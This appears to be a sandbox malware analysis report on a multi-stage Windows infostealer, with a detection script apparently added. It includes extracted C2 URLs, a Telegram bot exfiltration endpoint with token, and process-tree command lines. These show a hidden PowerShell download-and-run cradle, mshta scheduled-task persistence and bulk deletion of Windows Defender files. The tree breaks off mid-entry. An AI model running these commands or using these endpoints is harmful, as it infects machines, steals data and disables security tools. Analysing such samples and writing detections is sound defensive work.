Analysis

  • max time kernel
    140s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250610-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20250610-en locale:en-us os:windows10-2004-x64 system
  • submitted
    26/06/2025, 09:37

General

  • Target

    2025-06-26_21540af7452569fc839d3b2babe2c261_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe

  • Size

    938KB

  • MD5

    21540af7452569fc839d3b2babe2c261

  • SHA1

    008e0bc7c2e611464560fb1c77579efd0e1dd264

  • SHA256

    0490e90753356ad71f452357930a08137faec255ee5d4ed56dd21a19ede79bf5

  • SHA512

    fba778135b8ca9ccaa2336fa68e21858e45057893f9b831fb5db852b549054776dc5e019c8e16ea962db6bee49a686ba6b7d36be830141ac6d75fb0c1395cd30

  • SSDEEP

    24576:FqDEvCTbMWu7rQYlBQcBiT6rprG8a9sv:FTvC/MTQYxsWR7a9s

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.156.72.2/testmine/random.exe

Extracted

Family

lumma

C2

https://equidn.xyz/xapq/api

https://gewgb.xyz/axgh/api

https://skjgx.xyz/riuw/api

https://ropyi.xyz/zadf/api

https://spjeo.xyz/axka/api

https://baviip.xyz/twiw/api

https://shaeb.xyz/ikxz/api

https://firddy.xyz/yhbc/api

https://trqqe.xyz/xudu/api

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/sendMessage?chat_id=6299414420

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu, also known as WhiteSnake, is an information stealer written in C#.

  • Lumma Stealer, LummaC

    Lumma, also known as LummaC, is an infostealer written in C++ and first seen in August 2022.

  • Lumma family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with its console window hidden.

  • Downloads MZ/PE file 15 IoCs
  • Sets service image path in registry 2 TTPs 3 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 14 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 43 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 12 IoCs

    sc.exe is a Windows utility for controlling services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim host in order to infer its geographical location.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of SetWindowsHookEx 43 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs
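The signatures above map onto a small number of process-creation patterns that are visible in the process tree below: a schtasks /create whose action is mshta, a hidden-window PowerShell download cradle, a burst of reg query calls against Defender and Security Center service keys from one parent, and a /Delete operation naming Defender components. The following detection logic is an added example and is not part of the sandbox output; the event records are constructed from the command lines in this report, and the field names (pid, ppid, image, cmdline) and the benign control record are assumptions, not the sandbox's own schema.

```python
"""Process-creation detections for the chain shown in this report (added example,
not sandbox output). EVENTS is a constructed list of Sysmon-style records whose
command lines are copied from the process tree on this page; the field names and
the benign control record at the end are assumptions."""
import re
from collections import defaultdict

EVENTS = [
    {"pid": 3676, "ppid": 2492, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks /create /tn pYClLmal34e /tr "mshta C:\Users\Admin\Desktop\m1XO5qjHr.hta" /sc minute /mo 10 /ru "Admin" /f'},
    {"pid": 5976, "ppid": 2768, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:APPDATA+'BQCIJETUWMBNKI184FGZ9UFDLYLKWLVH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;'''},
    # reg query burst from the batch file's cmd.exe (PID 4048 in the tree)
    *[{"pid": p, "ppid": 4048, "image": r"C:\Windows\SysWOW64\reg.exe",
       "cmdline": r'reg query "HKLM\System\CurrentControlSet\Services\%s"' % s}
      for p, s in [(4700, "WinDefend"), (4708, "MDCoreSvc"), (5536, "WdNisSvc"), (2156, "Sense"), (1732, "WdFilter")]],
    {"pid": 4256, "ppid": 4048, "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmdline": r'reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"'},
    {"pid": 4876, "ppid": 4388, "image": r"C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe",
     "cmdline": r'C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\Windows\system32\SecurityHealthService.exe"'},
    # Constructed benign control (assumption): an ordinary scheduled task that must not fire.
    {"pid": 9001, "ppid": 9000, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn Backup /tr "C:\Tools\backup.exe" /sc daily /st 02:00'},
]

# Service names the batch file queried in this report (lower-cased for matching).
DEFENDER_SERVICES = {
    "windefend", "mdcoresvc", "wdnissvc", "sense", "wscsvc", "sgrmbroker",
    "securityhealthservice", "webthreatdefsvc", "webthreatdefusersvc", "wdnisdrv",
    "wdboot", "wdfilter", "sgrmagent", "mssecwfp", "mssecflt", "msseccore",
}
DEFENDER_PATH_MARKERS = ("windows defender", "securityhealth", "smartscreen", "windowsdefenderapplicationguard")
RECON_THRESHOLD = 3  # distinct security services queried by one parent before alerting


def _is(image, name):
    return image.lower().endswith("\\" + name)


def detect(events, recon_threshold=RECON_THRESHOLD):
    """Return one finding per matched rule; service recon is aggregated per parent PID."""
    findings = []
    recon = defaultdict(set)
    for e in events:
        img, cmd = e["image"], e["cmdline"]
        low = cmd.lower()
        # T1053.005: schtasks /create whose action launches mshta.
        if _is(img, "schtasks.exe") and "/create" in low and re.search(r'/tr\s+"?mshta', low):
            findings.append({"rule": "sched_task_mshta", "pid": e["pid"]})
        # T1059.001: hidden-window PowerShell that downloads from the network.
        if (_is(img, "powershell.exe") and re.search(r"-w(indowstyle)?\s+hidden", low)
                and re.search(r"download(file|string)", low)):
            urls = re.findall(r"https?://[^\s'\"]+", cmd)
            findings.append({"rule": "hidden_ps_download", "pid": e["pid"], "urls": urls})
        # T1518.001: reg query against Defender / Security Center service keys, counted per parent.
        if _is(img, "reg.exe") and low.startswith("reg query"):
            m = re.search(r'services\\([^\s"\\]+)', low)
            if m and m.group(1) in DEFENDER_SERVICES:
                recon[e["ppid"]].add(m.group(1))
        # T1562.001: a /Delete operation that names Defender or Security Health components.
        if "/delete" in low and any(marker in low for marker in DEFENDER_PATH_MARKERS):
            findings.append({"rule": "defender_file_tamper", "pid": e["pid"]})
    for ppid, names in recon.items():
        if len(names) >= recon_threshold:
            findings.append({"rule": "defender_service_recon", "ppid": ppid, "services": sorted(names)})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

The recon rule is deliberately aggregated rather than fired per reg.exe: a single query of WinDefend is common in legitimate administration, whereas more than a handful of distinct security-service keys read by one parent within a batch is the pattern seen here. The hidden_ps_download rule also keys on -w as the abbreviated form of -WindowStyle, which the cradle on this page does not use but which the same loader family could trivially switch to.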

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\control.exe
        C:\Windows\system32\control.exe
        2⤵
          PID:1396
          • C:\Windows\system32\control.exe
            C:\Windows\system32\control.exe
            3⤵
              PID:5384
        • C:\Users\Admin\AppData\Local\Temp\2025-06-26_21540af7452569fc839d3b2babe2c261_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe
          "C:\Users\Admin\AppData\Local\Temp\2025-06-26_21540af7452569fc839d3b2babe2c261_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe"
          1⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /tn pYClLmal34e /tr "mshta C:\Users\Admin\Desktop\m1XO5qjHr.hta" /sc minute /mo 10 /ru "Admin" /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2492
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn pYClLmal34e /tr "mshta C:\Users\Admin\Desktop\m1XO5qjHr.hta" /sc minute /mo 10 /ru "Admin" /f
              3⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:3676
          • C:\Windows\SysWOW64\mshta.exe
            mshta C:\Users\Admin\Desktop\m1XO5qjHr.hta
            2⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2768
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:APPDATA+'BQCIJETUWMBNKI184FGZ9UFDLYLKWLVH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;
              3⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5976
              • C:\Users\Admin\AppData\RoamingBQCIJETUWMBNKI184FGZ9UFDLYLKWLVH.EXE
                "C:\Users\Admin\AppData\RoamingBQCIJETUWMBNKI184FGZ9UFDLYLKWLVH.EXE"
                4⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2028
                • C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe
                  "C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe"
                  5⤵
                  • Downloads MZ/PE file
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2164
                  • C:\Users\Admin\AppData\Local\Temp\10495460101\index.exe
                    "C:\Users\Admin\AppData\Local\Temp\10495460101\index.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:5788
                    • C:\Temper\qUQ9sZlz.exe
                      "C:\Temper\qUQ9sZlz.exe"
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of WriteProcessMemory
                      PID:5396
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c ""C:\Temper\5Suk4e8N.exe" x -aoa -bso0 -bsp1 "C:\Temper\fhYewhdX.zip" -pc5Llr4Er -o"C:\Temper""
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:5452
                        • C:\Temper\5Suk4e8N.exe
                          "C:\Temper\5Suk4e8N.exe" x -aoa -bso0 -bsp1 "C:\Temper\fhYewhdX.zip" -pc5Llr4Er -o"C:\Temper"
                          9⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5036
                      • C:\Temper\TvKmbSZy.exe
                        "C:\Temper\TvKmbSZy.exe"
                        8⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:5232
                      • C:\Temper\HDfPAHEn.exe
                        "C:\Temper\HDfPAHEn.exe"
                        8⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1516
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y2surjz.bat" "
                          9⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4048
                          • C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe
                            nircmd win min process "cmd.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:3236
                          • C:\Windows\SysWOW64\chcp.com
                            chcp 65001
                            10⤵
                            • System Location Discovery: System Language Discovery
                            PID:2232
                          • C:\Windows\SysWOW64\reg.exe
                            reg query "HKU\S-1-5-19"
                            10⤵
                              PID:2564
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
                              10⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              PID:4896
                            • C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe
                              NSudoLG -U:T -P:E -UseCurrentConsole "C:\Users\Admin\AppData\Local\Temp\y2surjz.bat" any_word
                              10⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4948
                            • C:\Windows\SysWOW64\mode.com
                              Mode 79,49
                              10⤵
                              • System Location Discovery: System Language Discovery
                              PID:3304
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ver
                              10⤵
                                PID:1384
                              • C:\Windows\SysWOW64\reg.exe
                                reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
                                10⤵
                                • System Location Discovery: System Language Discovery
                                PID:1592
                              • C:\Windows\SysWOW64\find.exe
                                find /i "0x0"
                                10⤵
                                  PID:5952
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c tasklist
                                  10⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2540
                                  • C:\Windows\SysWOW64\tasklist.exe
                                    tasklist
                                    11⤵
                                    • Enumerates processes with tasklist
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3676
                                • C:\Windows\SysWOW64\reg.exe
                                  reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
                                  10⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4700
                                • C:\Windows\SysWOW64\reg.exe
                                  reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
                                  10⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4708
                                • C:\Windows\SysWOW64\reg.exe
                                  reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
                                  10⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5536
                                • C:\Windows\SysWOW64\reg.exe
                                  reg query "HKLM\System\CurrentControlSet\Services\Sense"
                                  10⤵
                                    PID:2156
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
                                    10⤵
                                      PID:536
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
                                      10⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1760
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
                                      10⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:816
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
                                      10⤵
                                        PID:4832
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
                                        10⤵
                                          PID:2292
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
                                          10⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3908
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
                                          10⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5504
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
                                          10⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1732
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
                                          10⤵
                                            PID:5176
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2508
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2016
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4604
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg query HKLM\System\CurrentControlset\Services\WdFilter
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies registry key
                                            PID:4284
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4256
                                          • C:\Windows\SysWOW64\find.exe
                                            find /i "Windows 7"
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4440
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" ver "
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5264
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /c:"6.1.7601"
                                            10⤵
                                              PID:5936
                                            • C:\Users\Admin\AppData\Local\Temp\Work\7z.exe
                                              7z x -aoa -bso0 -bsp1 "DKT.zip" -p"DDK" "Unlocker.exe"
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4036
                                            • C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
                                              Unlocker /CurrentDiskSize
                                              10⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              PID:4720
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
                                                11⤵
                                                  PID:700
                                                  • C:\Windows\system32\sc.exe
                                                    sc query IObitUnlocker
                                                    12⤵
                                                    • Launches sc.exe
                                                    PID:4336
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "4720"
                                                  11⤵
                                                    PID:5204
                                                    • C:\Windows\system32\taskkill.exe
                                                      taskkill /f /pid "4720"
                                                      12⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2112
                                                • C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
                                                  Unlocker /dеlwd
                                                  10⤵
                                                  • Sets service image path in registry
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5196
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
                                                    11⤵
                                                      PID:5712
                                                      • C:\Windows\system32\sc.exe
                                                        sc query IObitUnlocker
                                                        12⤵
                                                        • Launches sc.exe
                                                        PID:4556
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
                                                      11⤵
                                                        PID:3400
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop IObitUnlocker
                                                          12⤵
                                                          • Launches sc.exe
                                                          PID:2184
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete IObitUnlocker
                                                          12⤵
                                                          • Launches sc.exe
                                                          PID:3760
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "5196"
                                                        11⤵
                                                          PID:6128
                                                          • C:\Windows\system32\taskkill.exe
                                                            taskkill /f /pid "5196"
                                                            12⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2928
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 2 /nobreak
                                                        10⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Delays execution with timeout.exe
                                                        PID:1736
                                                      • C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
                                                        Unlocker /DеlWD
                                                        10⤵
                                                        • Sets service image path in registry
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4388
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
                                                          11⤵
                                                            PID:220
                                                            • C:\Windows\system32\sc.exe
                                                              sc query IObitUnlocker
                                                              12⤵
                                                              • Launches sc.exe
                                                              PID:6120
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                             C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4876
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3244
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
